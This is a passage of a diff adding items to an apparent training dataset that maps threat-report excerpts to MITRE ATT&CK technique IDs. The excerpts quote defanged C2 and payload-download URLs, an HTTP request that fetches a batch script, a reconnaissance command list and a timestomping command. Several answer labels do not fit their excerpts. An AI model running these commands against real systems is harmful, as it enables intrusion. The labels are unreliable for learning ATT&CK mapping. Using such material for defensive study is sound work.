sequence: The temp.ini files are copied into a text file that matches the pattern: From (- --).txt", + "output": "- T1057: Process Discovery\n- T1074: Data Staged\n- T1082: System Information Discovery\n- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Team member or team identifier Analysis of the OwaAuth web shell revealed a PDB string with the \"\"SyberSpace\"\" username (see Figure 20)\"", + "output": "- T1033: System Owner/User Discovery\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Techniques for Analysis When I was analyzing this sample, the malware was unable to connect to its C2.\u00a0 However, I was still able to analyze the network traffic of the sample.\u00a0 How, you might ask?\u00a0 Using a hex editor and a script I wrote to encrypt text using the algorithm that this sample uses, I encrypted my own C2 address (192.168.1.108:7721) and replaced the hardcoded C2 address with my own encrypted address.\u00a0 I then opened a listener on my own IP on the respective port.\u00a0 \u00a0 [Screenshot 3] comparison of My IP (Left) vs C2 IP (Right) Next, using a debugger, I set a couple breakpoints in the Internet Communications function and ran the malware.\u00a0 The malware sample then connected to my IP and sent information to me, which I was able to observe using Wireshark.\u00a0 After I\u2019d captured the traffic, I was able to write another script to decrypt and decompress the traffic in order to view the data being sent.\u00a0 Additionally, I then wrote a socket script that detects the Gh0stRAT variant traffic, automatically decrypts the traffic, and then extracts the Implant_Opcodes for the sample.\u00a0 A second version of the script allows commands to be sent back to the malware, after I enumerated the exact command format for the sample.\u00a0 [Screenshot 4] Output of Version 1 of the script So far, the 2 opcodes that the sample has sent are 0x65 and 0x66, or Implant_Heartbeat and Implant_Login, respectively.\u00a0 \u201cHitting between the heartbeats\u201d When sending commands, first the sample must login in with 0x65, then you can send commands to it.\u00a0 However, you have to move fast as the sample will send an Implant_Heartbeat followed by an Implant_Login every 10 seconds or so, and if you try to send a command to the sample as it is responding with either opcode, it will ignore the command.\u00a0 A proof of concept of the command script can be found\u00a0here\u00a0, while the Implant extraction script and the Command Script will be included in the Appendix", + "output": "- T1573: Encrypted Channel\n- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems", + "output": "- T1059: Command and Scripting Interpreter\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127.0.0.1, which is a variation of a technique known as \"\"parking.\"\" Other variations of parking point the IP address to Google's recursive name server 8.8.8.8, an address belonging to Confluence, or to other non-routable addresses\"", + "output": "- T1016: System Network Configuration Discovery\n- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations, preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX", + "output": "- T1059: Command and Scripting Interpreter\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The agent control panel has three tabs that have interfaces that allow the actor to issue commands, as well as upload and download files to and from the agent", + "output": "- T1543.001: Create or Modify System Process - Launch Agent\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The assembly code used to create the shellcode can be obtained from: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm The purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL \u201chxxp://45.76.128[.]165:4443/0w0O6\u201d", + "output": "- T1071: Application Layer Protocol\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The C2 communications begins with a beacon to the following URL: hxxp://www.windowspatch[.]com/khc? If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL", + "output": "- T1008: Fallback Channels\n- T1033: System Owner/User Discovery\n- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The code obtains the external IP address via an HTTP request using to \u201chttp://checkip.dyndns.org/\u201d and uses a regular expression to locate an IP address from the HTTP response", + "output": "- T1016: System Network Configuration Discovery\n- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The code then decodes this set of import symbols and resolves addresses for its networking and data stealing functionality: InternetCloseHandle InternetReadFile HttpSendRequestA HttpOpenRequestA HttpQueryInfoA InternetConnectA InternetCrackUrlA InternetOpenA InternetSetOptionW GetAdaptersInfo Much like the prior office monkey \u201catiumdag.dll\u201d component, this code collects identifying system information using standard win32 API calls: Computer name \u2013 GetComputerNameW User name \u2013 GetUserNameW Adapter GUID, ip address, mac address \u2013 GetAdaptersInfo Windows version \u2013 GetVersionExW It then uses the runtime resolved networking API calls to send the collected data back to a hardcoded c2 and set of urls", + "output": "- T1016: System Network Configuration Discovery\n- T1106: Native API\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The command handler obtains a command identifier from the C2 server and adds 0xFFFFFF9B to this value and then uses a switch statement to determine the appropriate command to execute", + "output": "- T1016: System Network Configuration Discovery\n- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)", + "output": "- T1486: Data Encrypted for Impact\n- T1005: Data from Local System\n- T1560: Archive Collected Data\n- T1027.002: Obfuscated Files or Information - Software Packing\n- T1140: Deobfuscate/Decode Files or Information\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The contents of the batch files vary depending on the OS (x64 vs x86). The batch files perform these tasks: Stop the service COMSysApp Configure the service to autostart (to set up persistence on the system) Modify registry keys to launch the DLL unser svchost.exe Specify the malicious DLL path to be loaded into the svchost process", + "output": "- T1112: Modify Registry\n- T1055: Process Injection\n- T1064: Scripting\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The data dump included the 0000000000.bat file, which when executed on an infected system would run the following commands to gather information to be sent back to the C2 server: whoami hostname ipconfig /all net user /domain net group /domain net group \u201cdomain admins\u201d /domain net group \u201cExchange Trusted Subsystem\u201d /domain net accounts /domain net user net localgroup administrators netstat -an tasklist systeminfo reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d schtasks /query /FO List /TN \u201cGoogleUpdatesTaskMachineUI\u201d /V | findstr /b /n /c:\u201dRepeat: Every:\u201d WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List This batch script is also interesting as it uses echo commands to include headers before each of the command results", + "output": "- T1087: Account Discovery\n- T1069: Permission Groups Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The data field within the message is a string of custom base64 encoded data that the malware decodes using the same custom base64 routine mentioned earlier and decrypts it using AES and the pre-shared key", + "output": "- T1573: Encrypted Channel\n- T1132: Data Encoding\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropper installs the backdoor, sets its attributes to \u201chidden\u201d, and sets a random file date and time When the dropper installs the backdoor, it sets its attributes to \u201chidden\u201d and sets file date and time to\u00a0 random values using the touch command: touch \u2013t YYMMDDMM \u201c/path/filename\u201d > /dev/null", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories\n- T1070.006: Indicator Removal - Timestomp\n- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The encrypted message is then Base64 encoded, replacing all the \u2018/\u2019 and \u2018+\u2019 characters with the \u2018.\u2019 and \u2018-\u2019 characters, respectively", + "output": "- T1132: Data Encoding\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it", + "output": "- T1064: Scripting\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The file is saved to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe 00 00 04 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad2.exe 00 00 05 The files notepad1.exe and notepad2.exe are concatenated together and written to C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe and executed 00 00 06 The contents of the following file is sent to the server: C:\\Users\\[Username]\\AppData\\Local\\Temp\\note.txt 00 00 07 The string following the command ID is executed using \"\"cmd /C\"\" and results are sent to server Links to APT3 On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment\"", + "output": "- T1087: Account Discovery\n- T1204: User Execution\n- T1036: Masquerading\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first email displays the following decoy document to the infected user and download the following payload:hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpgThe second email displays the following decoy document to the infected user and downloads the following payload:hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpgIn both cases, the downloaded payload is the ROKRAT malware.The first tasks of this variant of ROKRAT is to check the operating system version", + "output": "- T1105: Ingress Tool Transfer\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files: NOP sled composed of 0x90 and 0x91 opcodes The main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf", + "output": "- T1064: Scripting\n- T1105: Ingress Tool Transfer\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following commands are available: Command SubCommand Description VER Generates the following IRC client command that will be sent to the C2 server: \u00a0 PRIVMSG :\u00a0\u00a0\u00a0 8 LED= 20160124 KILL Trojan disconnects from the IRC server and terminates itself RESET Trojan disconnects from the IRC server and runs the executable again OS Obtains the Windows version and responds to the C2 with the following message \u201cPRIVMSG :\u201d: \u00a0 Windows NT Windows 95 Windows 98 Windows ME Windows 2003 Windows XP Windows 7 Windows Vista Unkown os info !SH EXEC Not supported MD Creates a specified directory", + "output": "- T1106: Native API\n- T1010: Application Window Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following commands are supported by the malware: Command ID Description 00 00 00 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe 00 00 01 Deletes the files: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe 00 00 02 Malware exits 00 00 03 Malware downloads the URL that follows the command ID", + "output": "- T1204: User Execution\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following functions are called when the application attempts to initialize the menu:ETransaksi.Speed(); // Legitimate class, but method is the first wrapped function that leads to malicious code ProjectData.EndApp(); // Closes the application before rest of legitimate Sales System Application functions are calledThe \u201cSpeed\u201d method in the legitimate ETransaksi class contains legitimate code from the Sales System Application; however, the author of this tool includes this code in an if/else construct that bypasses these instructions by setting a false flag to skip the legitimate code and execute the next step to the malicious code", + "output": "- T1189: Drive-by Compromise\n- T1027.001: Obfuscated Files or Information - Binary Padding\n- T1036: Masquerading\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following graph view from IDA shows these steps.These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process", + "output": "- T1059: Command and Scripting Interpreter\n- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following HTTP request from the Helminth backdoor (SHA256: 1fb69090be8a2e11eeb220b26ee5eddf1e3fe81ffa59c47d47d01bf90c2b080c) downloaded the similar batch script: GET /update-index.aspx?req=1786873725%5Cbat&m=d HTTP/1.1 Host: update-kernal[.]net Connection: Keep-Alive We performed a code comparison to visualize the similarities between the batch script delivered as the default command in Poison Frog is to the script provided to the Helminth backdoor", + "output": "- T1071: Application Layer Protocol\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following screenshot shows the command execution functionality in action: \u00a0 Figure 4:\u00a0Command\u00a0Execution The\u00a0paramString\u00a0parameter shown in the above screenshot\u00a0can be any command received from C&C", + "output": "- T1059: Command and Scripting Interpreter\n- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The frequent checking ensures that any changes made will be quickly followed, and the repeated attempts to run the Revenge RAT binary make it almost certain that even if the process is terminated, the RAT will be running again soon", + "output": "- T1057: Process Discovery\n- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%\\12-B-366.txt", + "output": "- T1070.006: Indicator Removal - Timestomp\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The function will take another executable embedded in the initial Trojan as a resource named \u201cM\u201d, which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it\u2019s configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe \u00a0 Embedded injector Trojan The R payload discussed above is nothing more than an injector Trojan, which accepts a path to an executable and a buffer of code to inject into the process as arguments", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process", + "output": "- T1055: Process Injection\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The information gathered is added to a string in the following structure: |||||||<\u201chybrid\u201d mode flag from config>|| The payload will base64 encode this string and use its DNS tunneling protocol to transmit the data to the C2", + "output": "- T1016: System Network Configuration Discovery\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The last query is to the subdomain ihc[.]stage[.]12019683[.]ns2[.]true-deals[.]com): \u00a0 The delivered second stage shellcode is encrypted: METERPRETER: After decryption of the second stage shellcode, the shellcode deletes the \u2018MZ\u2019 prefix from within a very important part of the shellcode", + "output": "- T1064: Scripting\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The latter PowerShell injects a shellcode into its own process using well-known CreateThread and VirtualAlloc techniques: \u00a0 SHELLCODE: The shellcode phase of this attack is unique and demonstrates the constantly advancing abilities of attackers", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their 